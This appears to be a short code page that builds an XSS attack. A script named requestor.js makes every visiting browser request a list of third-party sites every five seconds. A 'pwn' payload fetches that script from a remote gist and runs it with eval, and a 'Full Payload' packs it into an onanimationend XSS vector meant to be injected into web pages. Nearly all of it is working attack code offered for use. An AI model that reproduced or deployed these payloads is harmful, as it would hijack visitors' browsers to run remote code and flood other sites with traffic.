This script is requesting a lot of resources from client

.gitignore

index.html

requestor.js

function request(url){
  return new Promise((resolve, reject) => {
    console.log("[+]\tStart request \n[=]\t[%s]", url);

    var request = new XMLHttpRequest();
    request.open('GET', url);
    request.responseType = 'html/text';

    request.onload = function() {
        if (request.status === 200) {
          resolve(request.response);
        } else {
          reject(Error('Didn\'t load successfully; error code:' + request.statusText));
        }
    };
    request.onerror = function() {
        reject(Error('There was a network error.'));
    };
    // Send the request
    request.send();
  })
}

request('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/urls.json')
.then(function(response){
  var urls = JSON.parse(response).urls;

  setInterval(iterateRequest, 5000, urls);

}).catch((error)=>console.error(error));

function iterateRequest(array){
  array.forEach(element => {
    request(element).then(res => console.log("OK %s", element)).catch(err => console.error("KO %s", element));
  });
}

urls.json

{
  "urls": [
    "https://paukyblinders.fr/",
    "https://lostsh.github.io/",
    "https://v2.jokeapi.dev/joke/Any?safe-mode",
    "https://randomuser.me/api/",
    "https://api.chucknorris.io/jokes/random",
    "https://catfact.ninja/fact",
    "https://api.jokes.one/jod"
  ]
}

Payload

function pwn(){fetch('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();

Using request function

/* How to use the previous
 * function to request file
 * /
request('https://example.com/')
.then((response)=>console.log(response))
.catch((error)=>console.error(error));

Index file for testing index.html

<!DOCTYPE html>
<script src="requestor.js">
//function pwn(){fetch('http://localhost:8000/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();
</script>

Full Payload

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="function pwn(){fetch('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();"></xss>